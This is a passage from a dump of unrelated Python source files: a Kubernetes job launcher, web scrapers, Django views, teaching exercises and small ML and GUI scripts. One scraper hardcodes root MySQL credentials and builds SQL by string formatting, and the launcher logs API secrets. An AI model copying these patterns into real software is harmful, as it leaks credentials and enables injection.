name=volume_name,\n mount_path=ssh_folder\n )\n ],\n command=cmd\n )\n ]\n )\n )\n\n self.client.create_namespaced_pod(namespace=self.namespace, body=pod_body)\n\n return True\n\n def is_nuvla_job_running(self, job_id, job_execution_id):\n try:\n job = self.client.read_namespaced_pod(namespace=self.namespace, name=job_execution_id)\n except client.exceptions.ApiException as e:\n if e.status == 404:\n return False\n else:\n logging.error(f'Cannot handle job {job_id}. Reason: {str(e)}')\n # assume it is running so we don't mess anything\n return True\n\n try:\n if job.status.phase.lower() == 'running':\n logging.info(f'Job {job_id} is already running in pod {job.metadata.name}, with UID {job.metadata.uid}')\n return True\n elif job.status.phase.lower() == 'pending':\n logging.warning(f'Job {job_id} was created and still pending')\n # TODO: maybe we should run a cleanup for pending jobs after X hours\n else:\n if job.status.phase.lower() == 'succeeded':\n logging.info(f'Job {job_id} has already finished successfully. Deleting the pod...')\n # then it is probably UNKNOWN or in an undesired state\n self.client.delete_namespaced_pod(namespace=self.namespace, name=job_execution_id)\n except AttributeError:\n # assume it is running so we don't mess anything\n return True\n except client.exceptions.ApiException as e:\n # this exception can only happen if we tried to delete the pod and couldn't\n # log it and don't let another job come in\n logging.error(f'Failed to handle job {job_id} due to pod management error: {str(e)}')\n return True\n\n return False\n\n def launch_job(self, job_id, job_execution_id, nuvla_endpoint,\n nuvla_endpoint_insecure=False, api_key=None, api_secret=None, docker_image=None):\n\n cmd = f'-- /app/job_executor.py --api-url https://{nuvla_endpoint} ' \\\n f'--api-key {api_key} ' \\\n f'--api-secret {api_secret} ' \\\n f'--job-id {job_id}'\n\n if nuvla_endpoint_insecure:\n cmd = f'{cmd} --api-insecure'\n\n img = docker_image if docker_image else self.job_engine_lite_image\n logging.info(f'Starting job {job_id} from {img}, with command: \"{cmd}\"')\n\n pod_body = client.V1Pod(\n kind='Pod',\n metadata=client.V1ObjectMeta(name=job_execution_id),\n spec=client.V1PodSpec(\n node_name=self.host_node_name,\n restart_policy='Never',\n containers=[\n client.V1Container(\n name=job_execution_id,\n image=img,\n command=cmd\n )\n ]\n )\n )\n\n self.client.create_namespaced_pod(namespace=self.namespace, body=pod_body)\n\n def collect_container_metrics(self):\n pods_here = self.client.list_pod_for_all_namespaces(field_selector=f'spec.nodeName={self.host_node_name}')\n pods_here_per_name = {f'{p.metadata.namespace}/{p.metadata.name}': p for p in pods_here.items}\n\n this_node_capacity = self.get_node_info().status.capacity\n node_cpu_capacity = int(this_node_capacity['cpu'])\n node_mem_capacity = int(this_node_capacity['memory'].rstrip('Ki'))\n\n out = []\n pod_metrics_list = client.CustomObjectsApi().list_cluster_custom_object(\"metrics.k8s.io\", \"v1beta1\", \"pods\")\n\n items = pod_metrics_list.get('items', [])\n for pod in items:\n short_identifier = f\"{pod['metadata']['namespace']}/{pod['metadata']['name']}\"\n if short_identifier not in pods_here_per_name:\n continue\n\n for container in pod.get('containers', []):\n metrics = {\n 'id': pod['metadata']['selfLink'],\n 'name': container['name']\n }\n container_cpu_usage = int(container['usage']['cpu'].rstrip('n'))\n # units come in nanocores\n metrics['cpu-percent'] = \"%.2f\" % round(container_cpu_usage*100/(node_cpu_capacity*1000000000), 2)\n\n container_mem_usage = int(container['usage']['memory'].rstrip('Ki'))\n # units come in Ki\n metrics['mem-percent'] = \"%.2f\" % round(container_mem_usage*100/node_mem_capacity, 2)\n\n for cstat in pods_here_per_name[short_identifier].status.container_statuses:\n if cstat.name == container['name']:\n for k, v in cstat.state.to_dict().items():\n if v:\n metrics['container-status'] = k\n break\n\n container['restart-count'] = int(cstat.restart_count)\n\n out.append(metrics)\n\n return out\n\n def get_installation_parameters(self, search_label):\n nuvlabox_deployments = self.client_apps.list_namespaced_deployment(namespace=self.namespace,\n label_selector=search_label).items\n\n environment = []\n for dep in nuvlabox_deployments:\n dep_containers = dep.spec.template.spec.containers\n for container in dep_containers:\n try:\n env = container.env if container.env else []\n for env_var in env:\n try:\n _ = env_var.value_from\n # this is a templated var. No need to report it\n continue\n except AttributeError:\n pass\n\n environment.append(f'{env_var.name}={env_var.value}')\n except AttributeError:\n pass\n\n unique_env = list(filter(None, set(environment)))\n\n return {'project-name': self.namespace,\n 'environment': unique_env}\n\n def read_system_issues(self, node_info):\n errors = []\n warnings = []\n # TODO: is there a way to get any system errors from the k8s API?\n # The cluster-info dump reports a lot of stuff but is all verbose\n\n return errors, warnings\n\n def get_node_id(self, node_info):\n return node_info.metadata.name\n\n def get_cluster_id(self, node_info, default_cluster_name=None):\n cluster_id = default_cluster_name\n cluster_name = node_info.metadata.cluster_name\n if cluster_name:\n cluster_id = cluster_name\n\n return cluster_id\n\n def get_cluster_managers(self):\n managers = []\n for n in self.list_nodes():\n for label in n.metadata.labels:\n if 'node-role' in label and 'master' in label:\n managers.append(n.metadata.name)\n\n return managers\n\n def get_host_architecture(self, node_info):\n return node_info.status.node_info.architecture\n\n def get_hostname(self, node_info=None):\n return self.host_node_name\n\n def get_client_version(self):\n # IMPORTANT: this is only implemented for this k8s client class\n return self.get_node_info().status.node_info.kubelet_version\n\n def get_kubelet_version(self):\n # IMPORTANT: this is only implemented for this k8s client class\n return self.get_node_info().status.node_info.kubelet_version\n\n def get_cluster_join_address(self, node_id):\n # NOT IMPLEMENTED for k8s installations\n pass\n\n def is_node_active(self, node):\n if any(list(map(lambda n: n.type == 'Ready' and n.status == 'True', node.status.conditions))):\n return node.metadata.name\n\n return None\n\n def get_container_plugins(self):\n # TODO\n # doesn't seem to be available from the API\n return []\n\n def define_nuvla_infra_service(self, api_endpoint: str, tls_keys: list) -> dict:\n if api_endpoint:\n infra_service = {\n \"kubernetes-endpoint\": api_endpoint\n }\n\n if tls_keys:\n infra_service[\"kubernetes-client-ca\"] = tls_keys[0]\n infra_service[\"kubernetes-client-cert\"] = tls_keys[1]\n infra_service[\"kubernetes-client-key\"] = tls_keys[2]\n\n return infra_service\n else:\n return {}\n\n def get_partial_decommission_attributes(self) -> list:\n # TODO for k8s\n return []\n\n def infer_if_additional_coe_exists(self, fallback_address: str=None) -> dict:\n # For k8s installations, we might want to see if there's also Docker running alongside\n # TODO\n return {}\n\n def get_all_nuvlabox_components(self) -> list:\n # TODO\n return []\n\n","sub_path":"code/agent/orchestrator/kubernetes.py","file_name":"kubernetes.py","file_ext":"py","file_size_in_byte":15525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"180605675","text":"# -*- coding: UTF-8 -*-\nimport os\nimport time\nimport pymysql\nimport scrapy\n\nsql_list = []\nstart_time = time.time()\n\nroot_dir = r'C:\\Users\\Administrator.DESKTOP-DV7S27B\\Desktop\\IDGdemo\\selenium\\selenium公司详情'\nlists = os.listdir(root_dir) # 列出文件夹下所有的目录与文件\nfor i in range(0, len(lists)):\n path = os.path.join(root_dir, lists[i])\n if os.path.isfile(path): # #判断路径是否为文件\n with open(path, 'r', encoding='utf-8') as f: # 要读取非UTF-8编码的文本文件,需要给open()函数传入encoding参数\n page_source = f.read()\n page_sel = scrapy.Selector(text=page_source)\n name = page_sel.xpath('//*[@id=\"header\"]/div[2]/div[1]/span[1]//text()').extract_first()\n # 这里是新增的字段\n legal_name = page_sel.xpath('//*[@id=\"gongshangInfo\"]/div[3]/div[1]/span[2]/text()').extract_first()\n legal_person = page_sel.xpath('//*[@id=\"gongshangInfo\"]/div[3]/div[2]/span[2]/text()').extract_first()\n registered_capital = page_sel.xpath(\n '//*[@id=\"gongshangInfo\"]/div[3]/div[4]/table/tbody/tr/td[3]//text()').extract()\n registered_capital = list(set(registered_capital)) # 为了去重重复的'-'元素\n for capital in registered_capital:\n if '-' == capital:\n registered_capital.remove(capital) # 列表按值去掉元素\n print(name, registered_capital)\n registered_capital = sum([float(capital.replace('万人民币', '').strip()) for capital in registered_capital])\n competing_products = page_sel.xpath('//*[@class=\"jsx-2833694364 table-section\"]') # 取第二个\n for product in competing_products:\n print(product.extract())\n product_source = scrapy.Selector(text=product.extract())\n # competing_product = product_source.xpath('/html/body/div/div/div[4]/span/span/span[1]/a//text()').extract_first()\n competing_product = product_source.xpath('/html/body/div/div/div[1]/div/div[2]/div[1]/a//text()').extract_first()\n if competing_product:\n competing_product_list = ''.join(competing_product)\n db = pymysql.connect(\"192.168.103.31\", \"root\", \"adminadmin\", \"company\")\n # 使用 cursor() 方法创建一个游标对象 cursor\n cursor = db.cursor()\n # SQL 插入语句\n sql = \"UPDATE XINIU1203 SET legal_name = '%s',legal_person= '%s',registered_capital= '%s',competing_product= '%s' WHERE project_name = '%s'\" % (\n legal_name, legal_person, registered_capital, competing_product_list, name)\n print(sql)\n try:\n # 执行sql语句\n cursor.execute(sql)\n # 提交到数据库执行\n db.commit()\n except Exception as e:\n print(e)\n # 如果发生错误则回滚\n db.rollback()\n db.close()\nend_time = time.time()\nprint('花费时间', end_time - start_time)\n","sub_path":"IDGdemo/selenium/公司详情页解析.py","file_name":"公司详情页解析.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"453297025","text":"# -*- coding: utf-8 -*-\nimport time\nfrom requests import get\nimport win32com.client as win32\nfrom selenium import webdriver\nimport datetime\nimport re\nimport os\nimport csv\n\nDATA_DIR = '../../ScrapData'\nTEMP_DIR = os.path.join(os.getcwd(), \"../temp/\")\nCSV_POST = os.path.join(DATA_DIR, 'post_gongju_3.csv')\nTEMP_TXT_FILE = \"temp_gongju.txt\"\nTEMP_HW_FILE = \"temp_gongju.hwp\"\n\ndef main():\n get_list(\"20200101\", \"20201231\") # 수집할 새소식 기간 ex) (20200101, 20201231)\n\n\n\ndef get_list(srtdate, enddate):\n start_date = datetime.date(int(srtdate[:4]), int(srtdate[4:6]), int(srtdate[6:8]))\n end_date = datetime.date(int(enddate[:4]), int(enddate[4:6]), int(enddate[6:8]))\n\n # 스크랩 기능 구현\n cols = ['date', 'department', 'title', 'content']\n count = 0\n\n if not os.path.exists(CSV_POST):\n with open(CSV_POST, 'w', newline='', encoding='utf-8') as f:\n w = csv.writer(f)\n w.writerow(cols)\n\n for i in range(151, 313):\n driver = webdriver.Chrome('chromedriver', options=driver_option())\n driver.implicitly_wait(time_to_wait=5) # 암묵적 대기 단위 초\n url = \"https://www.gongju.go.kr/prog/saeolNews/sub04_02_01/list.do?pageIndex=\" + str(i)\n driver.get(url=url)\n tr = driver.find_element_by_tag_name(\"tbody\").find_elements_by_tag_name(\"tr\")\n\n for i in tr:\n td = i.find_elements_by_tag_name(\"td\")\n date = td[3].text\n text_date = datetime.datetime.strptime(date, '%Y-%m-%d').date()\n\n if text_date <= end_date:\n if text_date < start_date:\n break\n\n try:\n driver2 = webdriver.Chrome('chromedriver', options=driver_option())\n driver2.implicitly_wait(time_to_wait=10)\n\n postNum = td[1].find_element_by_tag_name(\"a\").get_attribute(\"onclick\")\n postNum = postNum.split(\"'\")[1]\n postURL = \"https://www.gongju.go.kr/prog/saeolNews/sub04_02_01/view.do?newsEpctNo=\" + postNum\n\n driver2.get(url=postURL)\n time.sleep(1)\n\n count += 1\n print(count)\n xpathTitle = \"/html/body/div[6]/div[2]/div/div[2]/div/div[1]/div[1]/h2\"\n\n department = td[2].text\n title = driver2.find_element_by_xpath(xpathTitle).text\n\n content = driver2.find_element_by_class_name(\"bbs--view--content\").text\n content = remove_whitespaces(content)\n\n print(\n \"DATE : \" + date + \"\\nDEPARTMENT : \" + department + \"\\nTITLE : \" + title + \"\\nCONTENT :\" + content)\n\n if len(content) == 0:\n content = \"empty\"\n\n with open(CSV_POST, 'a', newline='', encoding='utf-8') as f:\n row = [date, department, title, content]\n w = csv.writer(f)\n w.writerow(row)\n\n except Exception as e:\n print(e)\n print(\"데이터가 비었습니다.\")\n\n driver2.close()\n\n if text_date < start_date:\n break\n driver.close()\n\n\ndef get_text_file():\n f = open(TEMP_DIR + TEMP_TXT_FILE, mode='r')\n return f.read()\n\n\ndef driver_option():\n options = webdriver.ChromeOptions()\n options.add_argument('window-size=1920,1080')\n options.add_argument('headless')\n\n return options\n\n\ndef remove_whitespaces(text):\n lines = text.split('\\n')\n lines = (l.strip() for l in lines)\n lines = (l for l in lines if len(l) > 0)\n\n return '\\n'.join(lines)\n\n\nif __name__ == '__main__':\n main()","sub_path":"Scraper/gongju/scraping_Gongju.py","file_name":"scraping_Gongju.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"450477910","text":"import atexit\nimport json\nimport os\n\nfrom librarian import singleton\nfrom librarian import Manager\nfrom librarian import File\n\nfrom . import Researcher\nfrom . import Publication\nfrom .helpers import URL2soup\nfrom .helpers import researcher2publication as r2p\n\n\n@singleton\nclass Society(object):\n\n publATTR = ('li', {'class': 'li-publication'})\n\n def __init__(self, mainAuthor, authorFile, publicationFile):\n\n # A manager for the Society\n self.m = Manager()\n self.m.info('A new scientific Society has been created.')\n\n # Content\n self.authors = []\n self.author = None\n self.authorUpdate = True\n self.knownAuthors = {}\n self.publications = []\n self.knownPublications = {}\n\n # Data Files\n self.authorFile = None\n self.publicationFile = None\n\n self._initFiles(authorFile, publicationFile)\n if self.author is None:\n self._addMainAuthor(mainAuthor)\n\n def isAuthorInSociety(self, identifier):\n return int(identifier) in self.knownAuthors.keys()\n\n def isPublicationInSociety(self, identifier):\n return int(identifier) in self.knownPublications.keys()\n\n def getAuthor(self, identifier):\n return self.authors[self.knownAuthors[identifier]]\n\n def getPublication(self, identifier):\n return self.publications[self.knownPublications[identifier]]\n\n def searchPublications(self, updateJournal):\n r = Researcher\n url = '{0}/profile/{1}/publications?sorting=newest&page={2}'\n i = 1\n while len(self.publications) < self.author['pub_num']:\n soup = URL2soup(url.format(r.baseURL, self.author['profileName'], i))\n for p in soup(self.publATTR[0], attrs=self.publATTR[1]):\n self._addPublication(p, updateJournal)\n i += 1\n\n def _addPublication(self, soup, updateJournal):\n identifier = int(soup['id'].split('_')[-1])\n if not self.isPublicationInSociety(identifier):\n self.m.info('Capturing new publication {0}.'.format(identifier))\n publication = Publication(identifier, soup)\n for i in range(len(publication.authors)):\n a = publication.authors[i]\n if isinstance(a, int):\n a = self._trainAuthor(a)['identifier']\n else:\n a = self.author['identifier']\n publication.authors[i] = r2p(a)\n publication.authors[-1]['corresponding'] = True\n self.publications.append(publication.__dict__)\n self.knownPublications[identifier] = len(self.publications) - 1\n else:\n self.m.info('Updating data of {0}'.format(identifier))\n\n publication = self.getPublication(identifier)\n # update PI and citation data\n \n\n def _initFiles(self, authorFile, publicationFile):\n self._openFile(ftype = 'authors', filename = authorFile)\n self._openFile(ftype = 'publications', filename = publicationFile)\n\n def _addMainAuthor(self, identifier):\n ma = self._trainAuthor(identifier, mainAuthor = True)\n if self.author is not None:\n if ma == self.author:\n self.authorUpdate = False\n if ma['pub_num'] != self.author['pub_num']:\n n = ma['pub_num'] - self.author['pub_num']\n self.m.info('There are {0} new publications!'.format(n))\n if ma['citations'] != self.author['citations']:\n n = ma['citations'] - self.author['citations']\n self.m.info('There are {0} new citations!'.format(n))\n if ma['impact'] != self.author['impact']:\n n = ma['impact'] - self.author['impact']\n self.m.info('The impact factor is up by {0}!'.format(n))\n self.author = ma\n\n def _trainAuthor(self, identifier, mainAuthor = False):\n if not mainAuthor and self.isAuthorInSociety(identifier):\n ostring = 'Author {0} already belongs to the Society.'.format(identifier)\n self.m.info(ostring)\n return self.getAuthor(identifier)\n\n self.m.info('Getting data for author {0}.'.format(identifier))\n r = Researcher(identifier, mainAuthor).__dict__\n if not mainAuthor:\n self.authors.append(r)\n self.knownAuthors[r[\"identifier\"]] = len(self.authors) - 1\n return r\n\n def _openFile(self, ftype, filename):\n if os.path.isfile(filename):\n self.m.info('A previous {0} registry is loaded'.format(ftype))\n fd = File(filename)\n if ftype == 'authors':\n self._loadAuthorRegistry(fd.readJSON())\n elif ftype == 'publications':\n self._loadPublicationRegistry(fd.readJSON())\n fd.close()\n fd.unregister()\n\n else:\n self.m.info('A new {0} registry is created'.format(ftype))\n if ftype == 'authors':\n self.authorFile = filename\n atexit.register(self._writeAuthorsFile)\n elif ftype == 'publications':\n self.publicationFile = filename\n atexit.register(self._writePublicationsFile)\n\n def _loadAuthorRegistry(self, jsonArray):\n self.authors = jsonArray\n self.author = self.authors.pop(0)\n for i in range(len(self.authors)):\n self.knownAuthors[self.authors[i]['identifier']] = i\n\n def _loadPublicationRegistry(self, jsonArray):\n self.publications = jsonArray\n for i in range(len(self.publications)):\n self.knownPublications[self.publications[i]['identifier']] = i\n\n def _writeAuthorsFile(self):\n self.authors.insert(0, self.author)\n self.authorFile = File(self.authorFile, 'w')\n self.authorFile.write(json.dumps(self.authors, indent=2,\n separators=(',', ': ')))\n self.authorFile.close()\n\n def _writePublicationsFile(self):\n self.publicationFile = File(self.publicationFile, 'w')\n self.publicationFile.write(json.dumps(self.publications, indent=2,\n separators=(',', ': ')))\n self.publicationFile.close()\n","sub_path":"items/society.py","file_name":"society.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"273717981","text":"#encoding:UTF-8\n#Jorge Daniel Juárez Ruiz\n#Uso de ciclo for para distintas funciones. \n\nfrom Graphics import*\nfrom math import*\n\ndef calcularDivisores17():\n divisibles=0\n for x in range(1000,10000):\n if x%17==0:\n divisibles+=1\n print(divisibles)\n \n\ndef calcularPi():\n suma=0\n signo=1\n a=int(input(\"Lmite\"))\n for k in range(1,a,2):\n fraccion=signo/k\n signo*=-1\n suma+=fraccion\n suma=4*suma\n print(\"PI=\",suma)\n\ndef dibujarCirculosYCuadros():\n v=Window(\"Dibujos\",400,400)\n for x in range(1,200,10):\n a=Rectangle((200-x,200-x),(200+x,200+x))\n a.fill=None\n a.draw(v) \n for x in range(1,200,10):\n a=Circle((200,200),x)\n a.fill=None\n a.draw(v) \n\ndef dibujarEstrella():\n v=Window(\"Estrella\",400,400)\n tortuga=Arrow((100,250),0)\n tortuga.penDown()\n for x in range(5):\n tortuga.forward(200)\n tortuga.rotate(144)\n tortuga.draw(v)\n \ndef dibujarEspiral():\n v=Window(\"Estrella\",400,400)\n tortuga=Arrow((200,200),0)\n tortuga.penDown()\n for x in range (7,400,5):\n tortuga.forward(x)\n tortuga.rotate(90)\n tortuga.draw(v)\n \ndef dibujarCirculos():\n v=Window(\"Circulos\",400,400)\n a=(pi/6)\n \n for x in range(12):\n c=Circle((200+50*cos(a),200+50*sin(a)),50)\n c.fill=None\n c.draw(v)\n a+=(pi/6)\n \ndef imprimirOperaciones():\n y=1\n t=1\n for z in range (1,10):\n print(\"%i*8+%i=%i\" %(y,z,(y*8+z)))\n y+=(10**z)+t\n t=(10**z)+t\n t=1\n for z in range(1,10):\n print(\"%i*%i=%i\"%(t,t,t**2))\n t=(10**z)+t\n\n \ndef main():\n f=int(input(\"1.Circulos y cuadrados\\n2.Estrella\\n3.Espiral Cuadrada\\n4.Circulos\\n5.Calcular pi\\n6.Números de cuatro digitos divisibles entre 17\\n7.Operaciones\\n8.Salir\"))\n while f!=8:\n if f==1:\n dibujarCirculosYCuadros()\n if f==2:\n dibujarEstrella()\n if f==3:\n dibujarEspiral()\n if f==4:\n dibujarCirculos()\n if f==5:\n calcularPi()\n if f==6:\n calcularDivisores17()\n if f==7:\n imprimirOperaciones()\n f=int(input(\"1.Circulos y cuadrados\\n2.Estrella\\n3.Espiral Cuadrada\\n4.Círculos\\n5.Calcular pi\\n6.Números de cuatro digitos divisibles entre 17\\n7.Operaciones\\n8.Salir\"))\n \nmain()","sub_path":"cicloFor.py","file_name":"cicloFor.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"30648506","text":"from django.shortcuts import render\nfrom jobsapp.models import Hydjobs\nfrom jobsapp.models import Punejobs\nfrom jobsapp.models import Chennaijobs\nfrom jobsapp.models import Banglorejobs\nfrom jobsapp import forms\nfrom jobsapp .models import Student\nfrom django.contrib.auth.decorators import login_required\nfrom jobsapp.forms import SignUpForm\nfrom django.http import HttpResponseRedirect\n# Create your views here.\ndef thankyou_view(request):\n return render(request,'thank.html')\n\ndef index(request):\n\treturn render(request,'index.html')\n@login_required\ndef hydjobs(request):\n\thyd_list=Hydjobs.objects.all()\n\tmy_dict={'hyd_list':hyd_list}\n\treturn render(request,'hydjobs.html',context=my_dict)\n@login_required\ndef punejobs(request):\n\tpune_list=Punejobs.objects.all()\n\tmy_dict={'pune_list':pune_list}\n\treturn render(request,'pune.html',context=my_dict)\ndef signup_view(request):\n\tform=SignUpForm()\n\tif request.method=='POST':\n\t\tform=SignUpForm(request.POST)\n\t\tuser=form.save()\n\t\tuser.set_password(user.password)\n\t\tuser.save()\n\t\treturn HttpResponseRedirect('/accounts/login')\n\treturn render(request,'signup.html',{'form':form})\n\n\n\n\n@login_required\ndef chennaijobs(request):\n\tchennai_list=Chennaijobs.objects.all()\n\tmy_dict={'chennai_list':chennai_list}\n\treturn render(request,'chennai.html',context=my_dict)\n\n@login_required\ndef banglorejobs(request):\n\tbanglore_list=Banglorejobs.objects.all()\n\tmy_dict={'banglore_list':banglore_list}\n\treturn render(request,'banglore.html',context=my_dict)\n\n\n\n@login_required\ndef banglorejobs(request):\n\tbanglore_list=Banglorejobs.objects.all()\n\tmy_dict={'banglore_list':banglore_list}\n\treturn render(request,'banglore.html',context=my_dict)\n\n\n\n@login_required\ndef student_view(request):\n\tform=forms.StudentForm()\n\tif request.method=='POST':\n\t\tform=forms.StudentForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save(commit=True)\n\t\t\treturn thankyou_view(request)\n\t\n\treturn render(request ,'form.html',{'form':form})\n\n\n@login_required\ndef list_student(request):\n\tstudent_list=Student.objects.all()\n\treturn render(request,'student.html',{'student_list':student_list})\n","sub_path":"jobsinformation/jobsapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"401548229","text":"# definitions de quelques constantes\npi= 3.14159\ne= 2.71\ns= 1 #erreur 1\n\n\n# petit travail sur une chaine\n\nch= \"python\"\nch1=\"est une\"\nd= ch[5] + ch[4] + ch[3] + ch[2] + ch[1] + ch[0]\ne= ch[2:] + ch[0:2] #erreur 2\nf= ch[-1] #erreur 3\ng=ch1[:5]\nx=\"informatique\" #erreur 4\nprint(ch+ g +\"langage\"+x, \"formidable\") #erreur 5\n\n\n# calculs de quelques termes d'une suite\n\nx0= -2 \nx1= 4*x0 + 3 #erreur 6\nx2= 4*x1 + 3\nx3= 4*x2 + 3\nx4= 4*x3 + 3\nx5= 4*x4 + 3\nprint (\"finalement on trouve x5\")\n\n\n# autre suite \nn=0\nx=3 #erreur 7\nx=2+x/3\nn+=1\nx=2+x/3\nn+=1\nx=2+x/3\nn+=1\nx=2+x/3\nn+=1\nx=2+x/3\nprint(x) #erreur 8\n\n#dialogue\nn=input (\"quel est votre pseudo? \")\nprint (\"bonjour\",n) #erreur 9\na= input (\"votre annee de naissance ?\")\nprint ( \" ah vous avez \", 2016 - int(a), \"ans\") #erreur 10\n\"au revoir\"\n\n","sub_path":"L1/Semestre 2/TP INFO/TP1/erreur.py","file_name":"erreur.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"612394893","text":"import sys\nimport gym\n#import envs.arisim\n\nfrom baselines import deepq\nfrom gym.envs.registration import register\n\nregister(\n id='AirSimCarEnv-v22',\n entry_point='envs.airsim.airsimcarenv:AirSimCarEnv',\n max_episode_steps=200000,\n reward_threshold=25.0,\n)\n\n\n\ndef callback(lcl, glb):\n # stop training if reward exceeds 199999\n is_solved = lcl['t'] > 100 and sum(lcl['episode_rewards'][-101:-1]) / 100 >= 199999\n return is_solved\n\ndef main():\n env = gym.make(\"AirSimCarEnv-v22\")\n \n print(\"\\n======= Act session starts for DQN Car =======\") \n trainedModel = \"car.pkl\"\n \n act = load_act(trainedModel)\n\n\nif __name__ == '__main__':\n main()\n ","sub_path":"DRL/runcar.py","file_name":"runcar.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"363508788","text":"import pickle\n#loading a model from a file called model.pkl\nmodel = pickle.load(open(\"model.pkl\",\"rb\"))\n\ndataset = pickle.load(open(\"dataset.pkl\",\"rb\"))\n\n\n#aceste 2 functii vor fi utile pentru frontend --------------------------------\ndef getMakes():\n #returneaza o lista cu marcile masinilor din model pentru frontend\n makes = []\n \n for index,row in dataset.iterrows():\n if row['Make'] not in makes:\n makes.append(row['Make'])\n \n return makes\n\n\ndef getModels(make):\n #make e un string, adica e un element \n #din lista furnizata de functia de mai sus\n\n models = []\n \n for index,row in dataset.iterrows():\n if(row['Make'] == make and row['Model'] not in models):\n models.append(row['Model'])\n \n return models\n\nprint(getModels('Audi'))\n#------------------------------------------------------------------------------\n\n\nX = pickle.load(open(\"X.pkl\",\"rb\"))\n#functie pentru endpoint-ul in care vom face prezicerea primind ca parametrii\n#marca, modelul(furnizate de functiile de mai sus), anul si km\n\ndef estimatePrice(make,carmodel,year,mileage):\n \n index_X = 0\n \n for index,row in dataset.iterrows():\n if(row['Make'] == make and row['Model'] == carmodel):\n index_X = index\n \n variable = X[index_X]\n variable[-1] = mileage\n variable[-2] = year\n variable2 = []\n variable2.append(variable)\n variable2.append(variable)\n return model.predict(variable2)\n\n#functia asta va rezulta o lista cu 2 elemente, ambele sunt identice\n#motivul este ca pentru metoda predict a modelului aveam nevoie de o matrice\n#iar, eu am creat o matrice cu 2 linii care reprezinta de 2 ori datele despre masina\n\n\nprint(estimatePrice('Audi','A3Sedan',2015,25000))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"ML/deserializingModelTest.py","file_name":"deserializingModelTest.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"587756077","text":"import random\n\n\nclass Randomize:\n def __init__(self, level):\n \"\"\"\n :param level: level\n \"\"\"\n self.level = level\n\n def random_circle(self):\n \"\"\"\n This method random number of circle. Number depends on level which was chosen by user\n :return: number of circle\n \"\"\"\n value = 0\n if self.level == 0:\n value = random.randint(4, 7)\n if self.level == 1:\n value = random.randint(8, 10)\n if self.level == 2:\n value = random.randint(11, 13)\n return value\n","sub_path":"Hashi/randomize.py","file_name":"randomize.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"414951536","text":"from typing import Any, Dict\n\nfrom kivy import utils\nfrom kivy.graphics.context_instructions import Color\nfrom kivy.graphics.vertex_instructions import Rectangle\nfrom kivy.properties import StringProperty, ObjectProperty\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.relativelayout import RelativeLayout\nfrom kivy.uix.widget import Widget\n\nfrom graph import Graph, make_acyclic, calculate_rank, add_virtual_nodes, ordering, xcoordinate, ycoordinate\n\n\nclass Person(BoxLayout):\n name = StringProperty('Ivan Ivanov')\n sex = StringProperty('M')\n birthday = ObjectProperty(None)\n\n def __init__(self, ident: str, data, **kwargs):\n self._ident = ident\n super(Person, self).__init__(**kwargs)\n self.name = data.get('NAME', None)\n self.sex = data.get('SEX', None)\n self._famc = None\n self._fams = None\n\n def add_family_links(self, data, families: Dict[str, 'Family']):\n self._famc = families.get(data.get('FAMC', None), None)\n self._fams = families.get(data.get('FAMS', None), None)\n\n def __iter__(self):\n # if self._famc is not None:\n # yield self._famc\n if self._fams is not None:\n yield self._fams\n\n def __repr__(self):\n return f'<{self._ident}>'\n\n\nclass Family(BoxLayout):\n def __init__(self, ident: str, data: Dict[str, Any], persons: Dict[str, Person], **kwargs):\n self._ident = ident\n super(Family, self).__init__(**kwargs)\n self._husband = persons.get(data.get('HUSB', None), None)\n self._wife = persons.get(data.get('WIFE', None), None)\n children = data.get('CHIL', None)\n if children is not None:\n if type(children) is list:\n self._children_person = [persons.get(child, None) for child in children]\n else:\n self._children_person = [persons.get(children, None)]\n\n def __iter__(self):\n # if self._husband is not None:\n # yield self._husband\n # if self._wife is not None:\n # yield self._wife\n for child in self._children_person:\n yield child\n\n def __repr__(self):\n return f'<{self._ident}>'\n\n\nclass FamilyTreeGraph(RelativeLayout):\n\n def __init__(self, **kwargs):\n super(FamilyTreeGraph, self).__init__(**kwargs)\n self.persons = dict()\n self.families = dict()\n\n def parse_dict(self, data):\n print(data)\n self.persons = {key: Person(key, person) for key, person in data['INDI'].items()}\n self.families = {key: Family(key, fam, self.persons) for key, fam in data['FAM'].items()}\n for key, person in data['INDI'].items():\n self.persons[key].add_family_links(person, self.families)\n for i, (indi, person) in enumerate(self.persons.items()):\n self.add_widget(person)\n\n for i, (indi, fam) in enumerate(self.families.items()):\n self.add_widget(fam)\n self._loaded = True\n\n def test(self):\n if not getattr(self, '_loaded', False):\n return\n nodes = list(self.persons.values()) + list(self.families.values())\n edges = []\n for v in nodes:\n for u in v:\n edges.append((v, u))\n fg = Graph(edges, nodes)\n print(fg)\n make_acyclic(fg)\n ranks = calculate_rank(fg)\n virtual_nodes = add_virtual_nodes(fg, ranks)\n order = ordering(fg, ranks)\n xcoord = xcoordinate(fg, ranks, order)\n print(f'xcoord={xcoord}')\n ycoord = ycoordinate(fg, ranks, order)\n print(f'ycoord={ycoord}')\n\n for i, (indi, person) in 